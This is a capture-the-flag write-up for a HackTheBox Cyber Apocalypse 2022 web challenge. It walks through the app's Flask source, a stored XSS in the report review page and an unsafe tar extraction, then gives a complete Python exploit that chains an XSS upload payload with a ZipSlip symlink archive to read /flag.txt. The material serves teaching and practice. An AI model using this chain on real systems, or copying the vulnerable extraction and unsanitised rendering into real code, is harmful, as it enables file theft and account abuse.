B-XSS -> ZipSlip -> Local File Read

As usual, I got some time to play CTFs and decided to join my Team, TamilCTF, to play Cyber Apocalypse CTF 2022 (organized by HackTheBox). Let’s see a solution for one of the web challenges I solved during the event that I found interesting.
Introduction
- The following screenshot shows what the web app looks like:

- We are provided with the source code, and the following screenshot shows the source code structure:

Report:
- The following screenshot shows that the app has a reporting feature. It also has a bot. So, we need an XSS:

Source Code:
database.py (nothing super interesting — you can skip if you want)
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy_serializer import SerializerMixin
from flask_login import UserMixin
from flask import current_app
db = SQLAlchemy()
class User(db.Model, UserMixin):
    """Account row used by the login and registration routes."""

    id = db.Column(db.Integer, primary_key=True)
    # Usernames are unique across the table.
    username = db.Column(db.String(100), unique=True)
    # Held as a plain string column.
    password = db.Column(db.String(100))
class Firmware(db.Model, UserMixin, SerializerMixin):
    """Firmware module row; all descriptive fields are short strings."""

    id = db.Column(db.Integer, primary_key=True)
    module = db.Column(db.String(100))
    hw_version = db.Column(db.String(100))
    fw_version = db.Column(db.String(100))
    serial = db.Column(db.String(100))
    hub_id = db.Column(db.String(100))
class Report(db.Model, UserMixin, SerializerMixin):
    """Issue report submitted by a user against a firmware module."""

    id = db.Column(db.Integer, primary_key=True)
    module_id = db.Column(db.Integer)
    reported_by = db.Column(db.String(100))
    # Free-form text supplied by the reporting user.
    issue = db.Column(db.Text)
def clear_reports():
    """Delete every row of the Report table and commit the change."""
    all_reports = db.session.query(Report)
    all_reports.delete()
    db.session.commit()
def clear_db():
    """Empty every table known to the metadata, then commit."""
    # Walk the sorted tables in reverse order and issue a DELETE for each.
    for tbl in reversed(db.metadata.sorted_tables):
        db.session.execute(tbl.delete())
    db.session.commit()
def migrate_db():
    """Wipe the database and re-insert the admin user and the firmware rows."""
    clear_db()

    # admin user
    admin = User(
        id=1,
        username=current_app.config['ADMIN_USERNAME'],
        password=current_app.config['ADMIN_PASSWORD'],
    )
    db.session.add(admin)

    # firmwares: (module, hw_version, fw_version, serial, hub_id); ids run 1..10
    seed_rows = (
        ('Launch pod interface', 'd3', '2408.b', 'c6c3b20e', '17310'),
        ('Oxidizer controller', 'a4', '1801.c', 'b20418fc', '33194'),
        ('Propellant damper', 'b6', '1705.e', '7fdee87d', '19696'),
        ('RD-983 compressor', 'a1', '0002.a', 'b0dae2e3', '91284'),
        ('Refinery interface', 'g4', '4323.d', 'd0f2798d', '31157'),
        ('Condensation chamber', 'k3', '3467.p', '2e1e7897', '19850'),
        ('Fission reactor', 'p3', '9031.g', '9c431d03', '12488'),
        ('Booster core', 'i7', '7651.g', 'cd003b79', '12488'),
        ('Surface calibrator', 'a1', '4632.g', 'b320babd', '14274'),
        ('Nozzle controller', 'f6', '8731.g', '8be939d9', '78804'),
    )
    for row_id, (module, hw_version, fw_version, serial, hub_id) in enumerate(seed_rows, start=1):
        db.session.add(Firmware(
            id=row_id,
            module=module,
            hw_version=hw_version,
            fw_version=fw_version,
            serial=serial,
            hub_id=hub_id,
        ))

    db.session.commit()
routes.py
import json
from application.database import User, Firmware, Report, db, migrate_db
from application.util import is_admin, extract_firmware
from flask import Blueprint, jsonify, redirect, render_template, request
from flask_login import current_user, login_required, login_user, logout_user
from application.bot import visit_report
web = Blueprint('web', __name__)
api = Blueprint('api', __name__)
def response(message):
    """Wrap *message* in a JSON body of the form {"message": ...}."""
    body = {'message': message}
    return jsonify(body)
@web.route('/', methods=['GET'])
def login():
    """Serve the login page."""
    return render_template('login.html')
@api.route('/login', methods=['POST'])
def user_login():
    """Authenticate a user from a JSON body with `username` and `password`.

    Responds 401 when the body is not JSON or a field is missing/empty,
    403 when the credentials do not match, and 200 after logging the user in.
    """
    if not request.is_json:
        return response('Missing required parameters!'), 401

    payload = request.get_json()
    username = payload.get('username', '')
    password = payload.get('password', '')
    if not (username and password):
        return response('Missing required parameters!'), 401

    # The stored password is compared directly with the submitted value.
    account = User.query.filter_by(username=username).first()
    if not account or account.password != password:
        return response('Invalid username or password!'), 403

    login_user(account)
    return response('User authenticated successfully!')
@web.route('/register', methods=['GET'])
def register():
    """Serve the registration page."""
    return render_template('register.html')
@api.route('/register', methods=['POST'])
def user_registration():
    """Create a new user from a JSON body with `username` and `password`.

    Responds 401 when the body is not JSON, a field is missing/empty, or the
    username is already taken; otherwise stores the user and responds 200.
    """
    if not request.is_json:
        return response('Missing required parameters!'), 401

    payload = request.get_json()
    username = payload.get('username', '')
    password = payload.get('password', '')
    if not (username and password):
        return response('Missing required parameters!'), 401

    existing = User.query.filter_by(username=username).first()
    if existing:
        return response('User already exists!'), 401

    db.session.add(User(username=username, password=password))
    db.session.commit()
    return response('User registered successfully!')
@web.route('/dashboard')
@login_required
def dashboard():
    """Serve the dashboard page to a logged-in user."""
    return render_template('dashboard.html')
@api.route('/firmware/list', methods=['GET'])
@login_required
def firmware_list():
    """Return every Firmware row as a JSON list of dicts."""
    rows = Firmware.query.all()
    serialized = [row.to_dict() for row in rows]
    return jsonify(serialized)
@api.route('/firmware/report', methods=['POST'])
@login_required
def report_issue():
    """Store a report from a JSON body with `module_id` and `issue`.

    Responds 401 when the body is not JSON or a field is missing/empty.
    After saving the report, calls visit_report() and then migrate_db()
    before responding 200.
    """
    if not request.is_json:
        return response('Missing required parameters!'), 401

    payload = request.get_json()
    module_id = payload.get('module_id', '')
    issue = payload.get('issue', '')
    if not (module_id and issue):
        return response('Missing required parameters!'), 401

    # The issue text is stored exactly as submitted.
    db.session.add(Report(
        module_id=module_id,
        issue=issue,
        reported_by=current_user.username,
    ))
    db.session.commit()

    visit_report()
    migrate_db()
    return response('Issue reported successfully!')
@api.route('/firmware/upload', methods=['POST'])
@login_required
@is_admin
def firmware_update():
    """Accept an uploaded `file` part and hand it to extract_firmware().

    Responds 401 when no `file` part is present, 200 when extraction reports
    success, and 403 otherwise.
    """
    if 'file' not in request.files:
        return response('Missing required parameters!'), 401

    if extract_firmware(request.files['file']):
        return response('Firmware update initialized successfully.')

    return response('Something went wrong, please try again!'), 403
@web.route('/review', methods=['GET'])
@login_required
@is_admin
def review_report():
    """Render review.html with every stored Report."""
    stored_reports = Report.query.all()
    return render_template('review.html', reports=stored_reports)
@web.route('/logout')
@login_required
def logout():
    """Log the current user out and redirect to the login page."""
    logout_user()
    return redirect('/')
The `@login_required` middleware checks whether the user is authenticated. The `@is_admin` middleware checks whether the user is an administrator. The following snippet shows the `@is_admin` middleware function. Note that the check covers only the username and the IP address: the username must be equal to the admin's username configured in the app, and the source IP address of the request must be `127.0.0.1`.
def is_admin(f):
    """Decorator that only lets the configured admin, connecting from localhost, through.

    The wrapped view runs when the current user's username equals
    ADMIN_USERNAME from the app config and the request's remote address is
    127.0.0.1; any other request is aborted with 401.
    """
    @functools.wraps(f)
    def wrap(*args, **kwargs):
        name_matches = current_user.username == current_app.config['ADMIN_USERNAME']
        if not (name_matches and request.remote_addr == '127.0.0.1'):
            return abort(401)
        return f(*args, **kwargs)

    return wrap
Api Routes:
- The `/api/register` route handles the user registration functionality:
@api.route('/register', methods=['POST'])
def user_registration():
    """Create a new user from a JSON body with `username` and `password`.

    Responds 401 when the body is not JSON, a field is missing/empty, or the
    username is already taken; otherwise stores the user and responds 200.
    """
    if not request.is_json:
        return response('Missing required parameters!'), 401

    payload = request.get_json()
    username = payload.get('username', '')
    password = payload.get('password', '')
    if not (username and password):
        return response('Missing required parameters!'), 401

    existing = User.query.filter_by(username=username).first()
    if existing:
        return response('User already exists!'), 401

    db.session.add(User(username=username, password=password))
    db.session.commit()
    return response('User registered successfully!')
@web.route('/dashboard')
- The `/api/login` route handles the login functionality:
@api.route('/login', methods=['POST'])
def user_login():
    """Authenticate a user from a JSON body with `username` and `password`.

    Responds 401 when the body is not JSON or a field is missing/empty,
    403 when the credentials do not match, and 200 after logging the user in.
    """
    if not request.is_json:
        return response('Missing required parameters!'), 401

    payload = request.get_json()
    username = payload.get('username', '')
    password = payload.get('password', '')
    if not (username and password):
        return response('Missing required parameters!'), 401

    # The stored password is compared directly with the submitted value.
    account = User.query.filter_by(username=username).first()
    if not account or account.password != password:
        return response('Invalid username or password!'), 403

    login_user(account)
    return response('User authenticated successfully!')
- The `/api/firmware/report` route handles a report submitted by a user and saves it in the database. `visit_report()` is the function that is called to make the bot view the submitted report. `migrate_db()` is the function that then clears the database (including the stored reports) and re-seeds it.
@api.route('/firmware/report', methods=['POST'])
@login_required
def report_issue():
    """Store a report from a JSON body with `module_id` and `issue`.

    Responds 401 when the body is not JSON or a field is missing/empty.
    After saving the report, calls visit_report() and then migrate_db()
    before responding 200.
    """
    if not request.is_json:
        return response('Missing required parameters!'), 401

    payload = request.get_json()
    module_id = payload.get('module_id', '')
    issue = payload.get('issue', '')
    if not (module_id and issue):
        return response('Missing required parameters!'), 401

    # The issue text is stored exactly as submitted.
    db.session.add(Report(
        module_id=module_id,
        issue=issue,
        reported_by=current_user.username,
    ))
    db.session.commit()

    visit_report()
    migrate_db()
    return response('Issue reported successfully!')
- The following snippet shows the code handling the `/api/firmware/upload` route, which can be used to upload files. Note that both `@login_required` and `@is_admin` are set, meaning that only the admin can upload files.
@api.route('/firmware/upload', methods=['POST'])
@login_required
@is_admin
def firmware_update():
    """Accept an uploaded `file` part and hand it to extract_firmware().

    Responds 401 when no `file` part is present, 200 when extraction reports
    success, and 403 otherwise.
    """
    if 'file' not in request.files:
        return response('Missing required parameters!'), 401

    if extract_firmware(request.files['file']):
        return response('Firmware update initialized successfully.')

    return response('Something went wrong, please try again!'), 403
- The `extract_firmware()` function is called to extract the uploaded file, as shown in the following snippet:
def extract_firmware(file):
    """Save an uploaded archive to the temp directory and unpack it.

    The upload is written to the system temp directory under the filename
    supplied with the upload. If it is a tar archive, every member is
    extracted into the temp directory, and regular files are then moved into
    a fresh sub-directory of UPLOAD_FOLDER.

    Returns True when the upload was a tar archive, False otherwise.
    """
    tmp = tempfile.gettempdir()
    # The client-supplied filename is joined to the temp dir as-is.
    path = os.path.join(tmp, file.filename)
    file.save(path)
    if tarfile.is_tarfile(path):
        tar = tarfile.open(path, 'r:gz')
        # All members are extracted before any per-member check below runs;
        # member names and types are not validated at this point.
        tar.extractall(tmp)
        # presumably a random name of length 15 -- `generate` is defined elsewhere; confirm
        rand_dir = generate(15)
        extractdir = f"{current_app.config['UPLOAD_FOLDER']}/{rand_dir}"
        os.makedirs(extractdir, exist_ok=True)
        for tarinfo in tar:
            name = tarinfo.name
            if tarinfo.isreg():
                try:
                    # Move the already-extracted regular file into extractdir.
                    filename = f'{extractdir}/{name}'
                    os.rename(os.path.join(tmp, name), filename)
                    continue
                except:
                    # Any failure of the move is ignored and falls through
                    # to the makedirs call below.
                    pass
            # Reached for non-regular members and for failed moves: a
            # directory with the member's name is created under extractdir.
            os.makedirs(f'{extractdir}/{name}', exist_ok=True)
        tar.close()
        return True
    return False
- As observed, the uploaded file is first stored in the temporary directory (`/tmp`), and the variable `path` holds the full path of the saved file. For example, if a file named `myfile.tar.gz` is uploaded, then it will be stored at `/tmp/myfile.tar.gz`.
tmp = tempfile.gettempdir()
path = os.path.join(tmp, file.filename)
file.save(path)
- Before extracting the saved file, the function first checks whether it is a valid tar file, and if so, it unpacks it into the `/tmp` directory, as shown in the following snippet:
if tarfile.is_tarfile(path):
tar = tarfile.open(path, 'r:gz')
tar.extractall(tmp)
Furthermore, the following snippet shows a loop that checks whether each extracted file is a regular file or something else, such as a symlink.
If an extracted file is a regular file, then it is moved to the `/app/application/static/firmware/[random_number]` directory, which is inside the application's static directory. This means we can access the files in this directory from the web application. However, we need to know the value of `[random_number]`. If we can leak the `[random_number]`, then we can read files uploaded to the server.
If an extracted file is not a regular file, then it is not moved from the `/tmp` directory to the static directory; a directory with the same name is created under the static directory instead:
for tarinfo in tar:
name = tarinfo.name
if tarinfo.isreg():
try:
filename = f'{extractdir}/{name}'
os.rename(os.path.join(tmp, name), filename)
continue
except:
pass
os.makedirs(f'{extractdir}/{name}', exist_ok=True)
tar.close()
- The `/review` endpoint handles the `GET` method and renders the stored reports on the page. Additionally, only the `Admin` user can access this route, as shown in the following snippet:
@web.route('/review', methods=['GET'])
@login_required
@is_admin
def review_report():
    """Render review.html with every stored Report."""
    stored_reports = Report.query.all()
    return render_template('review.html', reports=stored_reports)
Review.html
- In `Review.html`, the user input is not sanitized before being rendered (note the `| safe` filter applied to the issue text). As a result, we have an XSS here!
<div class="card-header"> Reported by : USER
</div>
<div class="card-body">
<p class="card-title">Module ID : {{ report.module_id }}</p>
<p class="card-text">Issue : {{ report.issue | safe }} </p>
<a href="#" class="btn btn-primary">Reply</a>
<a href="#" class="btn btn-danger">Delete</a>
</div>
Exploit Idea:
Now we have an XSS. However, the session cookies are set to `HTTPOnly`, so we can't use JavaScript to read them. We can still make the browser use the cookie from JavaScript without reading it, though. Regardless, even if we were able to exfiltrate the session cookie, we couldn't access the admin endpoints, since the source IP of the request must be equal to `127.0.0.1`.

With this blind XSS, we can force the bot user to upload a malicious `tar` file using the `/api/firmware/upload` endpoint.

There is a well-known vulnerability called `ZipSlip`, which allows us to pack files into tar or zip archives under names that contain path traversal sequences, so that the files are written outside the intended directory when the archive is unpacked.

We can create a `symlink` file that points to `/flag.txt` and use the ZipSlip vulnerability to make the extracted file land in the application's static directory. Since the check that makes sure the files are regular files only covers the `/tmp` directory, where the files are initially extracted, our traversed file will not be caught.

Note: Traversing the extracted file into the `/app/application/static` directory is what helps us bypass the `tarinfo.isreg()` check.
Exploit:
- To automate this, I wrote a python script:
import requests
import os
import random
import string
import tarfile
# Alphabet for the throwaway credentials.
letters = string.ascii_lowercase
# Ten random lowercase letters, used as both username and password.
randomText = ''.join(random.choices(letters, k=10))
# Base URL of the target instance.
url = 'http://localhost:1337'
def registerUser(username, password):
    """Register an account on the target; print the response and exit on failure."""
    credentials = {"username": username, "password": password}
    resp = requests.post(url + '/api/register', json=credentials)
    if resp.status_code == 200:
        return
    print(resp.text)
    exit()
def loginUser(username, password):
    """Log in and store the session cookie in the module-level `cookies` dict.

    Prints the response body and exits when the login request does not
    return 200, or when the response carries no `session` cookie.
    """
    global cookies

    r = requests.post(url + '/api/login', json={"username": username, "password": password})
    if r.status_code != 200:
        print(r.text)
        exit()

    # Read the cookie from the parsed cookie jar rather than splitting the raw
    # Set-Cookie header: the header may be absent, may list another cookie
    # first, and a value containing '=' would be truncated by the split.
    session = r.cookies.get('session')
    if session is None:
        print('Login succeeded but no session cookie was returned')
        exit()

    cookies = {
        'session': session
    }
    # Touch the dashboard with the new session, as the original script did.
    requests.get(url + '/dashboard', cookies=cookies)
def makeTar():
    """Write `exp.tar.gz` containing a single path-traversing symlink member.

    The archive holds one symlink named
    `../app/application/static/getflag.txt` that points at `/flag.txt`.
    The member is built in memory, so nothing is created or deleted outside
    the current directory and no external tools (mkdir/ln/mv/gzip/rm) are
    required. An existing `exp.tar.gz` is overwritten.
    """
    link = tarfile.TarInfo('../app/application/static/getflag.txt')
    link.type = tarfile.SYMTYPE
    link.linkname = '/flag.txt'

    # 'w:gz' writes the gzip-compressed archive directly.
    with tarfile.open('exp.tar.gz', 'w:gz') as tar:
        tar.addfile(link)
def js():
    """Build the XSS payload that uploads `exp.tar.gz` from the victim's browser.

    Reads `exp.tar.gz` from the current directory, base64-encodes it, deletes
    the file, and embeds the encoded archive in a <script> block that posts
    it to the firmware upload endpoint.

    The module-level name `js` is rebound to the payload string (report()
    reads it from there), and the payload is also returned.

    Raises:
        FileNotFoundError: if `exp.tar.gz` does not exist.
    """
    import base64  # local import: not among the script's top-level imports

    global js

    # Encode in-process and only then delete the file. The previous
    # `cat | base64 -w0` pipe ran asynchronously and could race with the
    # removal; `-w0` is also specific to GNU base64.
    with open('exp.tar.gz', 'rb') as archive:
        b64String = base64.b64encode(archive.read()).decode('ascii')
    os.remove('exp.tar.gz')

    payload = """
<script>
function base64toBlob(base64Data, contentType) {
contentType = contentType || '';
var sliceSize = 1024;
var byteCharacters = atob(base64Data);
var bytesLength = byteCharacters.length;
var slicesCount = Math.ceil(bytesLength / sliceSize);
var byteArrays = new Array(slicesCount);
for (var sliceIndex = 0; sliceIndex < slicesCount; ++sliceIndex) {
var begin = sliceIndex * sliceSize;
var end = Math.min(begin + sliceSize, bytesLength);
var bytes = new Array(end - begin);
for (var offset = begin, i = 0; offset < end; ++i, ++offset) {
bytes[i] = byteCharacters[offset].charCodeAt(0);
}
byteArrays[sliceIndex] = new Uint8Array(bytes);
}
return new Blob(byteArrays, { type: contentType });
}
var b64file = """+f"'{b64String}'"+""";
var content_type = 'application/x-gtar-compressed';
var blob = base64toBlob(b64file, content_type);
var formData = new FormData();
formData.append('file', blob,'abcd');
var url = 'http://localhost:1337/api/firmware/upload';
var request = new XMLHttpRequest();
request.withCredentials = true;
request.open('POST', url);
request.send(formData);
</script>
"""
    # Keep the original contract: after the call, the global `js` is the payload.
    js = payload
    return payload
def report():
    """Submit the payload held in `js` as a firmware issue report.

    Prints the response body and exits when the request does not return 200.
    """
    body = {"module_id": "1", "issue": f"{js}"}
    resp = requests.post(url + '/api/firmware/report', cookies=cookies, json=body)
    if resp.status_code == 200:
        return
    print(resp.text)
    exit()
def getflag():
    """Fetch /static/getflag.txt from the target, print it stripped, and exit."""
    flag_url = url + '/static/getflag.txt'
    resp = requests.get(flag_url)
    print(resp.text.strip())
    exit()
def main():
    """Run the exploit steps in order: register, log in, build, report, read."""
    # The same random string serves as both username and password.
    credential = randomText
    registerUser(credential, credential)
    loginUser(credential, credential)
    makeTar()
    js()
    report()
    getflag()


if __name__ == "__main__":
    main()
- Running it, we get the flag, as shown in the following screenshot:




